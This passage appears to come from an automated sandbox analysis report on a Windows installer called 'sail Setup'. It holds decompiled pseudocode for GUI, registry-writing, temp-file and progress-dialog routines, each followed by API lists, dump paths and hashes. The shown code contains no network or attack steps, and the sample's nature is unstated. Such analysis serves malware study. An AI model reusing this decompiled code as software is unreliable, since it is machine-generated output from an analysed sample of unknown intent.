                                                                                                                          				if((_t49[5] & 0x00000004) != 0) {
                                                                                                                          					SetBkColor(_a8, _t37);
                                                                                                                          				}
                                                                                                                          				if((_t49[5] & 0x00000010) != 0) {
                                                                                                                          					_v16.lbStyle = _t49[2];
                                                                                                                          					_t40 = _t49[3];
                                                                                                                          					if(_t40 != 0) {
                                                                                                                          						DeleteObject(_t40);
                                                                                                                          					}
                                                                                                                          					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                                                          				}
                                                                                                                          				return _t49[3];
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                          • Instruction ID: 6c7fdd900eb09a88ca35fb2207b5deae9db7ec429e3ae93f4f07cdddb38981b8
                                                                                                                          • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                          • Instruction Fuzzy Hash: 1F219671904744ABCB219F78DD08B4B7FF8AF00715F048A2AF856E22E1C338EA04CB95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E0040267C(struct _OVERLAPPED* __ebx) {
                                                                                                                          				void* _t27;
                                                                                                                          				long _t32;
                                                                                                                          				struct _OVERLAPPED* _t47;
                                                                                                                          				void* _t51;
                                                                                                                          				void* _t53;
                                                                                                                          				void* _t56;
                                                                                                                          				void* _t57;
                                                                                                                          				void* _t58;
                                                                                                                          
                                                                                                                          				_t47 = __ebx;
                                                                                                                          				 *(_t58 - 8) = 0xfffffd66;
                                                                                                                          				_t52 = E004029F6(0xfffffff0);
                                                                                                                          				 *(_t58 - 0x44) = _t24;
                                                                                                                          				if(E0040553D(_t52) == 0) {
                                                                                                                          					E004029F6(0xffffffed);
                                                                                                                          				}
                                                                                                                          				E00405695(_t52);
                                                                                                                          				_t27 = E004056B4(_t52, 0x40000000, 2);
                                                                                                                          				 *(_t58 + 8) = _t27;
                                                                                                                          				if(_t27 != 0xffffffff) {
                                                                                                                          					_t32 =  *0x423e94; // 0x7e00
                                                                                                                          					 *(_t58 - 0x2c) = _t32;
                                                                                                                          					_t51 = GlobalAlloc(0x40, _t32);
                                                                                                                          					if(_t51 != _t47) {
                                                                                                                          						E00403080(_t47);
                                                                                                                          						E0040304E(_t51,  *(_t58 - 0x2c));
                                                                                                                          						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                                                                                                          						 *(_t58 - 0x30) = _t56;
                                                                                                                          						if(_t56 != _t47) {
                                                                                                                          							E00402E5B( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                                                                                                          							while( *_t56 != _t47) {
                                                                                                                          								_t49 =  *_t56;
                                                                                                                          								_t57 = _t56 + 8;
                                                                                                                          								 *(_t58 - 0x38) =  *_t56;
                                                                                                                          								E00405675( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                                                                                          								_t56 = _t57 +  *(_t58 - 0x38);
                                                                                                                          							}
                                                                                                                          							GlobalFree( *(_t58 - 0x30));
                                                                                                                          						}
                                                                                                                          						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                                                                                                                          						GlobalFree(_t51);
                                                                                                                          						 *(_t58 - 8) = E00402E5B(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                                                                                          					}
                                                                                                                          					CloseHandle( *(_t58 + 8));
                                                                                                                          				}
                                                                                                                          				_t53 = 0xfffffff3;
                                                                                                                          				if( *(_t58 - 8) < _t47) {
                                                                                                                          					_t53 = 0xffffffef;
                                                                                                                          					DeleteFileA( *(_t58 - 0x44));
                                                                                                                          					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                                                                                          				}
                                                                                                                          				_push(_t53);
                                                                                                                          				E00401423();
                                                                                                                          				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t58 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00007E00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                                          • GlobalFree.KERNEL32 ref: 00402725
                                                                                                                          • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                                          • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                                          • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3294113728-0
                                                                                                                          • Opcode ID: b65008d77356e61c7ec7953c9ee0e327e44be4943e63621df6e0ee83a23bc65b
                                                                                                                          • Instruction ID: 12be5ee7c0a04460072f4a22dab7179149aa53ae67e7a866020ad89d1ba75591
                                                                                                                          • Opcode Fuzzy Hash: b65008d77356e61c7ec7953c9ee0e327e44be4943e63621df6e0ee83a23bc65b
                                                                                                                          • Instruction Fuzzy Hash: 5831C071C00128BBDF216FA5CD88EAE7E79EF04368F10423AF524762E0C7795D419BA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404D7B(CHAR* _a4, CHAR* _a8) {
                                                                                                                          				struct HWND__* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				CHAR* _v32;
                                                                                                                          				long _v44;
                                                                                                                          				int _v48;
                                                                                                                          				void* _v52;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				CHAR* _t26;
                                                                                                                          				signed int _t27;
                                                                                                                          				CHAR* _t28;
                                                                                                                          				long _t29;
                                                                                                                          				signed int _t39;
                                                                                                                          
                                                                                                                          				_t26 =  *0x423664; // 0x0
                                                                                                                          				_v8 = _t26;
                                                                                                                          				if(_t26 != 0) {
                                                                                                                          					_t27 =  *0x423f34; // 0x0
                                                                                                                          					_v12 = _t27;
                                                                                                                          					_t39 = _t27 & 0x00000001;
                                                                                                                          					if(_t39 == 0) {
                                                                                                                          						E004059FF(0, _t39, 0x41fc50, 0x41fc50, _a4);
                                                                                                                          					}
                                                                                                                          					_t26 = lstrlenA(0x41fc50);
                                                                                                                          					_a4 = _t26;
                                                                                                                          					if(_a8 == 0) {
                                                                                                                          						L6:
                                                                                                                          						if((_v12 & 0x00000004) == 0) {
                                                                                                                          							_t26 = SetWindowTextA( *0x423648, 0x41fc50);
                                                                                                                          						}
                                                                                                                          						if((_v12 & 0x00000002) == 0) {
                                                                                                                          							_v32 = 0x41fc50;
                                                                                                                          							_v52 = 1;
                                                                                                                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                                                          							_v44 = 0;
                                                                                                                          							_v48 = _t29 - _t39;
                                                                                                                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                                                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                                                          						}
                                                                                                                          						if(_t39 != 0) {
                                                                                                                          							_t28 = _a4;
                                                                                                                          							 *((char*)(_t28 + 0x41fc50)) = 0;
                                                                                                                          							return _t28;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                                                          						if(_t26 < 0x800) {
                                                                                                                          							_t26 = lstrcatA(0x41fc50, _a8);
                                                                                                                          							goto L6;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t26;
                                                                                                                          			}


















                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                          • lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                          • lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                                                          • SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2531174081-0
                                                                                                                          • Opcode ID: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                                                                                                          • Instruction ID: 7f48be0438031ac4014e4461c76190d89e96d247d5b12388d0b77bfdc4e74ae1
                                                                                                                          • Opcode Fuzzy Hash: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                                                                                                          • Instruction Fuzzy Hash: 09216DB1E00158BBDB119FA5CD84ADEBFB9FF45354F14807AFA04B6290C7398A419B98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040464A(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                          				long _v8;
                                                                                                                          				signed char _v12;
                                                                                                                          				unsigned int _v16;
                                                                                                                          				void* _v20;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				long _v56;
                                                                                                                          				void* _v60;
                                                                                                                          				long _t15;
                                                                                                                          				unsigned int _t19;
                                                                                                                          				signed int _t25;
                                                                                                                          				struct HWND__* _t28;
                                                                                                                          
                                                                                                                          				_t28 = _a4;
                                                                                                                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                                          				if(_a8 == 0) {
                                                                                                                          					L4:
                                                                                                                          					_v56 = _t15;
                                                                                                                          					_v60 = 4;
                                                                                                                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                                          					return _v24;
                                                                                                                          				}
                                                                                                                          				_t19 = GetMessagePos();
                                                                                                                          				_v16 = _t19 >> 0x10;
                                                                                                                          				_v20 = _t19;
                                                                                                                          				ScreenToClient(_t28,  &_v20);
                                                                                                                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                                          				if((_v12 & 0x00000066) != 0) {
                                                                                                                          					_t15 = _v8;
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          				return _t25 | 0xffffffff;
                                                                                                                          			}















                                                                                                                          APIs
                                                                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404665
                                                                                                                          • GetMessagePos.USER32 ref: 0040466D
                                                                                                                          • ScreenToClient.USER32 ref: 00404687
                                                                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404699
                                                                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046BF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                          • Instruction ID: 811e074b116e6ce6d11e192741490be2760717d42b69e64a674173994bb84636
                                                                                                                          • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                          • Instruction Fuzzy Hash: 4E014C71D00219BADB00DBA4DC85FFEBBB8AB59711F10052ABA00B61D0D7B8A9058BA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                          				char _v68;
                                                                                                                          				int _t11;
                                                                                                                          				int _t20;
                                                                                                                          
                                                                                                                          				if(_a8 == 0x110) {
                                                                                                                          					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                          					_a8 = 0x113;
                                                                                                                          				}
                                                                                                                          				if(_a8 == 0x113) {
                                                                                                                          					_t20 =  *0x40b018; // 0x7e00
                                                                                                                          					_t11 =  *0x41f028;
                                                                                                                          					if(_t20 >= _t11) {
                                                                                                                          						_t20 = _t11;
                                                                                                                          					}
                                                                                                                          					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                                                          					SetWindowTextA(_a4,  &_v68);
                                                                                                                          					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                                          • MulDiv.KERNEL32(00007E00,00000064,?), ref: 00402B81
                                                                                                                          • wsprintfA.USER32 ref: 00402B91
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00402BB3
                                                                                                                          Strings
                                                                                                                          • verifying installer: %d%%, xrefs: 00402B8B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                          • Opcode ID: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                                                                                                          • Instruction ID: e41715c37a5330c5740685503c003044c4943c79b663b03d39d41db920bc543d
                                                                                                                          • Opcode Fuzzy Hash: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                                                                                                          • Instruction Fuzzy Hash: 34014470A00209ABDB249F60DD09EAE3779AB04345F008039FA16B92D1D7B49A559F99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E00402303(void* __eax) {
                                                                                                                          				void* _t15;
                                                                                                                          				char* _t18;
                                                                                                                          				int _t19;
                                                                                                                          				char _t24;
                                                                                                                          				int _t27;
                                                                                                                          				signed int _t30;
                                                                                                                          				intOrPtr _t35;
                                                                                                                          				void* _t37;
                                                                                                                          
                                                                                                                          				_t15 = E00402AEB(__eax);
                                                                                                                          				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                                                                                                          				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                                                                                                          				 *(_t37 - 0x44) = E004029F6(2);
                                                                                                                          				_t18 = E004029F6(0x11);
                                                                                                                          				_t30 =  *0x423f30; // 0x0
                                                                                                                          				 *(_t37 - 4) = 1;
                                                                                                                          				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                                                                                                                          				if(_t19 == 0) {
                                                                                                                          					if(_t35 == 1) {
                                                                                                                          						E004029F6(0x23);
                                                                                                                          						_t19 = lstrlenA(0x40a350) + 1;
                                                                                                                          					}
                                                                                                                          					if(_t35 == 4) {
                                                                                                                          						_t24 = E004029D9(3);
                                                                                                                          						 *0x40a350 = _t24;
                                                                                                                          						_t19 = _t35;
                                                                                                                          					}
                                                                                                                          					if(_t35 == 3) {
                                                                                                                          						_t19 = E00402E5B( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a350, 0xc00);
                                                                                                                          					}
                                                                                                                          					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a350, _t19) == 0) {
                                                                                                                          						 *(_t37 - 4) = _t27;
                                                                                                                          					}
                                                                                                                          					_push( *(_t37 + 8));
                                                                                                                          					RegCloseKey();
                                                                                                                          				}
                                                                                                                          				 *0x423f08 =  *0x423f08 +  *(_t37 - 4);
                                                                                                                          				return 0;
                                                                                                                          			}












                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402341
                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse728B.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402361
                                                                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse728B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse728B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nse728B.tmp
                                                                                                                          • API String ID: 1356686001-827905961
                                                                                                                          • Opcode ID: 9ba96a6a32475b5f8f04ccfbc4be301ddec9fd1a1c55997cdc687cc56a4b0e43
                                                                                                                          • Instruction ID: 0c84a363429982d99d3a5a271a87b4b8d308e401ccf86a25fc22d5166c0076e5
                                                                                                                          • Opcode Fuzzy Hash: 9ba96a6a32475b5f8f04ccfbc4be301ddec9fd1a1c55997cdc687cc56a4b0e43
                                                                                                                          • Instruction Fuzzy Hash: 781163B1E00209BFEB10AFA4DE49EAF767CFB40358F10413AF901B61D0D6B85D019669
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004037EF(void* __ecx, void* __eflags) {
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				signed short _t6;
                                                                                                                          				intOrPtr _t11;
                                                                                                                          				signed int _t13;
                                                                                                                          				intOrPtr _t15;
                                                                                                                          				signed int _t16;
                                                                                                                          				signed short* _t18;
                                                                                                                          				signed int _t20;
                                                                                                                          				signed short* _t23;
                                                                                                                          				intOrPtr _t25;
                                                                                                                          				signed int _t26;
                                                                                                                          				intOrPtr* _t27;
                                                                                                                          
                                                                                                                          				_t24 = "1033";
                                                                                                                          				_t13 = 0xffff;
                                                                                                                          				_t6 = E00405954(__ecx, "1033");
                                                                                                                          				while(1) {
                                                                                                                          					_t26 =  *0x423ec4; // 0x1
                                                                                                                          					if(_t26 == 0) {
                                                                                                                          						goto L7;
                                                                                                                          					}
                                                                                                                          					_t15 =  *0x423e90; // 0x4868b0
                                                                                                                          					_t16 =  *(_t15 + 0x64);
                                                                                                                          					_t20 =  ~_t16;
                                                                                                                          					_t18 = _t16 * _t26 +  *0x423ec0;
                                                                                                                          					while(1) {
                                                                                                                          						_t18 = _t18 + _t20;
                                                                                                                          						_t26 = _t26 - 1;
                                                                                                                          						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						if(_t26 != 0) {
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						goto L7;
                                                                                                                          					}
                                                                                                                          					 *0x423660 = _t18[1];
                                                                                                                          					 *0x423f28 = _t18[3];
                                                                                                                          					_t23 =  &(_t18[5]);
                                                                                                                          					if(_t23 != 0) {
                                                                                                                          						 *0x42365c = _t23;
                                                                                                                          						E0040593B(_t24,  *_t18 & 0x0000ffff);
                                                                                                                          						SetWindowTextA( *0x420450, E004059FF(_t13, _t24, _t26, "sail Setup", 0xfffffffe));
                                                                                                                          						_t11 =  *0x423eac; // 0x1
                                                                                                                          						_t27 =  *0x423ea8; // 0x486a5c
                                                                                                                          						if(_t11 == 0) {
                                                                                                                          							L15:
                                                                                                                          							return _t11;
                                                                                                                          						}
                                                                                                                          						_t25 = _t11;
                                                                                                                          						do {
                                                                                                                          							_t11 =  *_t27;
                                                                                                                          							if(_t11 != 0) {
                                                                                                                          								_t5 = _t27 + 0x18; // 0x486a74
                                                                                                                          								_t11 = E004059FF(_t13, _t25, _t27, _t5, _t11);
                                                                                                                          							}
                                                                                                                          							_t27 = _t27 + 0x418;
                                                                                                                          							_t25 = _t25 - 1;
                                                                                                                          						} while (_t25 != 0);
                                                                                                                          						goto L15;
                                                                                                                          					}
                                                                                                                          					L7:
                                                                                                                          					if(_t13 != 0xffff) {
                                                                                                                          						_t13 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t13 = 0x3ff;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}

















                                                                                                                          0x004038a5
                                                                                                                          0x004038a9
                                                                                                                          0x004038a9
                                                                                                                          0x004038ae
                                                                                                                          0x004038b4
                                                                                                                          0x004038b4
                                                                                                                          0x00000000
                                                                                                                          0x0040389e
                                                                                                                          0x00403852
                                                                                                                          0x00403857
                                                                                                                          0x00403860
                                                                                                                          0x00403859
                                                                                                                          0x00403859
                                                                                                                          0x00403859
                                                                                                                          0x00403857

                                                                                                                          APIs
                                                                                                                          • SetWindowTextA.USER32(00000000,sail Setup), ref: 00403887
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: TextWindow
                                                                                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\$\jH$sail Setup
                                                                                                                          • API String ID: 530164218-3812902334
                                                                                                                          • Opcode ID: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
                                                                                                                          • Instruction ID: 1abde7c3b4d11e9a2e55591403c44a3397e590d434b7b54f33d2a439c9831bdd
                                                                                                                          • Opcode Fuzzy Hash: 809311cf63a270f3da3981a90469c0860d530fe9ed693af6c887377ad56b97b2
                                                                                                                          • Instruction Fuzzy Hash: 0711C276B002119BC730AF55D8809377BADEF4471631981BFE80167390C73D9E028B98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E10001ADF(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				char _v148;
                                                                                                                          				void _t46;
                                                                                                                          				void _t47;
                                                                                                                          				signed int _t48;
                                                                                                                          				signed int _t49;
                                                                                                                          				signed int _t58;
                                                                                                                          				signed int _t59;
                                                                                                                          				signed int _t61;
                                                                                                                          				signed int _t62;
                                                                                                                          				void* _t68;
                                                                                                                          				void* _t69;
                                                                                                                          				void* _t70;
                                                                                                                          				void* _t71;
                                                                                                                          				void* _t72;
                                                                                                                          				signed int _t78;
                                                                                                                          				void* _t82;
                                                                                                                          				signed int _t86;
                                                                                                                          				signed int _t88;
                                                                                                                          				signed int _t91;
                                                                                                                          				void* _t102;
                                                                                                                          
                                                                                                                          				_t86 = __edx;
                                                                                                                          				 *0x10004058 = _a8;
                                                                                                                          				_t78 = 0;
                                                                                                                          				 *0x1000405c = _a16;
                                                                                                                          				_v8 = 0;
                                                                                                                          				_a16 = E10001561();
                                                                                                                          				_a8 = E10001561();
                                                                                                                          				_t91 = E10001641(_a16);
                                                                                                                          				_t82 = _a8;
                                                                                                                          				_t88 = _t86;
                                                                                                                          				_t46 =  *_t82;
                                                                                                                          				if(_t46 != 0x7e && _t46 != 0x21) {
                                                                                                                          					_v16 = E10001561();
                                                                                                                          					_t78 = E10001641(_t75);
                                                                                                                          					_v8 = _t86;
                                                                                                                          					GlobalFree(_v16);
                                                                                                                          					_t82 = _a8;
                                                                                                                          				}
                                                                                                                          				_t47 =  *_t82;
                                                                                                                          				_t102 = _t47 - 0x2f;
                                                                                                                          				if(_t102 > 0) {
                                                                                                                          					_t48 = _t47 - 0x3c;
                                                                                                                          					__eflags = _t48;
                                                                                                                          					if(_t48 == 0) {
                                                                                                                          						__eflags =  *((char*)(_t82 + 1)) - 0x3c;
                                                                                                                          						if( *((char*)(_t82 + 1)) != 0x3c) {
                                                                                                                          							__eflags = _t88 - _v8;
                                                                                                                          							if(__eflags > 0) {
                                                                                                                          								L54:
                                                                                                                          								_t49 = 0;
                                                                                                                          								__eflags = 0;
                                                                                                                          								L55:
                                                                                                                          								asm("cdq");
                                                                                                                          								L56:
                                                                                                                          								_t91 = _t49;
                                                                                                                          								_t88 = _t86;
                                                                                                                          								L57:
                                                                                                                          								E1000176C(_t86, _t91, _t88,  &_v148);
                                                                                                                          								E1000159E( &_v148);
                                                                                                                          								GlobalFree(_a16);
